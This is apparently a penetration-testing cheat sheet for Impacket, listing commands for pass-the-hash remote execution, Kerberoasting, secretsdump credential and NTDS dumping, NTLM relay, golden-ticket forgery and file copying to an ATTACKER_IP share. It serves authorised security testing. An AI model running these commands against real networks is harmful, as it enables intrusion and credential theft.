Impacket

A collection of Python classes for working with network protocols, essential for Windows and Active Directory penetration testing.

Installation

# Install via pip
pip install impacket

# Or from source
git clone https://github.com/fortra/impacket.git
cd impacket
pip install .

SMB Enumeration

smbclient.py

# List shares
smbclient.py domain/user:password@target

# Null session
smbclient.py target

# With hash
smbclient.py -hashes :NTHASH domain/user@target

# List shares only
smbclient.py domain/user:password@target -list

smbserver.py

# Start SMB server for file transfers
impacket-smbserver share $(pwd) -smb2support

# With authentication
impacket-smbserver share $(pwd) -smb2support -username user -password pass

# Windows access
# net use \\ATTACKER_IP\share
# copy file.txt \\ATTACKER_IP\share\

Remote Execution

psexec.py

# Execute with credentials
psexec.py domain/user:password@target

# With NTLM hash
psexec.py -hashes :NTHASH domain/user@target

# Different service name (stealth)
psexec.py domain/user:password@target -service-name CustomSvc

# Execute command
psexec.py domain/user:password@target "whoami"

wmiexec.py

# WMI execution (no service creation)
wmiexec.py domain/user:password@target

# With hash
wmiexec.py -hashes :NTHASH domain/user@target

# Execute command
wmiexec.py domain/user:password@target "ipconfig"

# Quieter than psexec, no SMB writes

atexec.py

# Execute via Task Scheduler
atexec.py domain/user:password@target "whoami"

# With hash
atexec.py -hashes :NTHASH domain/user@target "ipconfig"

dcomexec.py

# Execute via DCOM
dcomexec.py domain/user:password@target

# With hash
dcomexec.py -hashes :NTHASH domain/user@target

# Different DCOM object
dcomexec.py -object MMC20 domain/user:password@target

Kerberos Attacks

GetNPUsers.py

ASREPRoast - Extract hashes for users with "Do not require Kerberos preauthentication"

# Single user
GetNPUsers.py domain/user -dc-ip 192.168.1.10 -no-pass

# User list
GetNPUsers.py domain/ -usersfile users.txt -dc-ip 192.168.1.10 -no-pass

# Domain format
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 192.168.1.10

# Request format for Hashcat
GetNPUsers.py domain/ -usersfile users.txt -format hashcat -dc-ip 192.168.1.10

# Output to file
GetNPUsers.py domain/ -usersfile users.txt -dc-ip 192.168.1.10 -outputfile asrep_hashes.txt

Crack with Hashcat:

hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt

GetUserSPNs.py

Kerberoasting - Request TGS tickets for service accounts

# Enumerate SPNs
GetUserSPNs.py domain/user:password -dc-ip 192.168.1.10

# Request TGS tickets
GetUserSPNs.py domain/user:password -dc-ip 192.168.1.10 -request

# Output to file
GetUserSPNs.py domain/user:password -dc-ip 192.168.1.10 -request -outputfile tgs_hashes.txt

# With hash
GetUserSPNs.py -hashes :NTHASH domain/user -dc-ip 192.168.1.10 -request

# Save tickets
GetUserSPNs.py domain/user:password -dc-ip 192.168.1.10 -request-user SPN_USER -save

Crack with Hashcat:

hashcat -m 13100 tgs_hashes.txt /usr/share/wordlists/rockyou.txt

getTGT.py

Request TGT (Ticket Granting Ticket)

# Get TGT with password
getTGT.py domain/user:password

# Get TGT with hash
getTGT.py -hashes :NTHASH domain/user

# Specify DC
getTGT.py domain/user:password -dc-ip 192.168.1.10

# Outputs user.ccache file
export KRB5CCNAME=user.ccache

getST.py

Request Service Ticket

# Request ST for specific SPN
getST.py -spn cifs/target.domain.local domain/user:password

# With TGT
getST.py -spn cifs/target.domain.local -hashes :NTHASH domain/user

# Impersonate user (S4U2Self)
getST.py -spn cifs/target.domain.local -impersonate administrator domain/user:password

Credential Dumping

secretsdump.py

Extract credentials from various sources

# Dump from SAM/SECURITY/SYSTEM
secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL

# Remote dump via SMB
secretsdump.py domain/user:password@target

# With hash
secretsdump.py -hashes :NTHASH domain/user@target

# NTDS.dit dump
secretsdump.py domain/user:password@dc.domain.local -just-dc

# NTDS with specific user
secretsdump.py domain/user:password@dc.domain.local -just-dc-user administrator

# Dump NTLM hashes only
secretsdump.py domain/user:password@target -just-dc-ntlm

# Historical passwords
secretsdump.py domain/user:password@dc.domain.local -history

# VSS shadow copy method
secretsdump.py domain/user:password@target -use-vss

mimikatz.py

Remote mimikatz via RPC

# Execute mimikatz commands
mimikatz.py domain/user:password@target

# Example commands once connected:
# lsadump::sam
# sekurlsa::logonpasswords

NTLM Relay

ntlmrelayx.py

# Relay to SMB
ntlmrelayx.py -t smb://target -smb2support

# Relay with specific target list
ntlmrelayx.py -tf targets.txt -smb2support

# Dump SAM
ntlmrelayx.py -t smb://target -smb2support --sam

# Execute command
ntlmrelayx.py -t smb://target -smb2support -c "whoami"

# SOCKS proxy
ntlmrelayx.py -tf targets.txt -smb2support -socks

# Relay to LDAP (get domain info)
ntlmrelayx.py -t ldap://dc.domain.local --escalate-user lowpriv

# Relay to HTTP
ntlmrelayx.py -t http://target/api -smb2support

LDAP Enumeration

GetADUsers.py

# Enumerate domain users
GetADUsers.py -all domain/user:password -dc-ip 192.168.1.10

# With hash
GetADUsers.py -all -hashes :NTHASH domain/user -dc-ip 192.168.1.10

# Specific user details
GetADUsers.py domain/user:password -dc-ip 192.168.1.10 -user administrator

GetUserSPNs.py

# List all SPNs
GetUserSPNs.py domain/user:password -dc-ip 192.168.1.10

# Request specific SPN
GetUserSPNs.py domain/user:password -dc-ip 192.168.1.10 -request-user svcSQL

Database Attacks

mssqlclient.py

# Connect to MSSQL
mssqlclient.py domain/user:password@target

# Windows authentication
mssqlclient.py -windows-auth domain/user:password@target

# With hash
mssqlclient.py -hashes :NTHASH domain/user@target

# Execute command
mssqlclient.py domain/user:password@target -db master

# Once connected:
# enable_xp_cmdshell
# xp_cmdshell whoami

Network Sniffing

sniffer.py

# Capture packets
sniffer.py -i eth0

# Filter by host
sniffer.py -i eth0 -filter "host 192.168.1.10"

DPAPI

dpapi.py

# Decrypt DPAPI blob
dpapi.py masterkey -file masterkey_file -sid S-1-5-21... -password password

# Decrypt Chrome passwords
dpapi.py credential -file Login Data

Golden/Silver Tickets

ticketer.py

# Create golden ticket
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain domain.local administrator

# Create silver ticket
ticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-... -domain domain.local -spn cifs/target.domain.local administrator

# Use ticket
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass domain.local/administrator@target.domain.local

LDAP Queries

ldapdomaindump.py

# Dump domain information
ldapdomaindump domain/user:password -d dc.domain.local

# Output to directory
ldapdomaindump domain/user:password -d dc.domain.local -o output/

Useful Scripts

lookupsid.py

Enumerate domain SIDs

# Brute force SIDs
lookupsid.py domain/user:password@target

# With hash
lookupsid.py -hashes :NTHASH domain/user@target

# RID cycling
lookupsid.py domain/user:password@target 500

rpcdump.py

Enumerate RPC endpoints

# Dump RPC info
rpcdump.py domain/user:password@target

# With hash
rpcdump.py -hashes :NTHASH domain/user@target

samrdump.py

Dump SAM remotely

# Enumerate users via SAM
samrdump.py domain/user:password@target

# With hash
samrdump.py -hashes :NTHASH domain/user@target

reg.py

Remote registry operations

# Query registry
reg.py domain/user:password@target query -keyName HKLM\\SOFTWARE\\Microsoft

# Save registry hive
reg.py domain/user:password@target backup -keyName HKLM\\SAM

# With hash
reg.py -hashes :NTHASH domain/user@target query -keyName HKLM\\SYSTEM

Common Workflows

Initial Access from Hash

# 1. Test access
crackmapexec smb target -u administrator -H NTHASH

# 2. Execute commands
wmiexec.py -hashes :NTHASH domain/administrator@target

# 3. Or get shell
psexec.py -hashes :NTHASH domain/administrator@target

Domain Enumeration

# 1. Get domain users
GetADUsers.py -all domain/user:password -dc-ip DC_IP > users.txt

# 2. Look for AS-REP roastable accounts
GetNPUsers.py domain/ -usersfile users.txt -dc-ip DC_IP

# 3. Look for Kerberoastable accounts
GetUserSPNs.py domain/user:password -dc-ip DC_IP -request

Credential Dumping Workflow

# 1. Dump local creds
secretsdump.py domain/user:password@target

# 2. If domain admin, dump NTDS
secretsdump.py domain/admin:password@dc.domain.local -just-dc

# 3. Extract NTLM hashes
secretsdump.py domain/admin:password@dc.domain.local -just-dc-ntlm -outputfile ntds_hashes

Useful Links

• Impacket GitHub
• Impacket Examples
• HackTricks Impacket
• Kerberoasting Explained
• NTLM Relay

Quick Reference

# SMB access
smbclient.py domain/user:password@target

# Remote shell
psexec.py domain/user:password@target
wmiexec.py domain/user:password@target

# AS-REP Roasting
GetNPUsers.py domain/ -usersfile users.txt -dc-ip DC_IP

# Kerberoasting
GetUserSPNs.py domain/user:password -dc-ip DC_IP -request

# Dump credentials
secretsdump.py domain/user:password@target
secretsdump.py domain/admin:password@dc -just-dc

# NTLM Relay
ntlmrelayx.py -tf targets.txt -smb2support

# With hash (any tool)
TOOL.py -hashes :NTHASH domain/user@target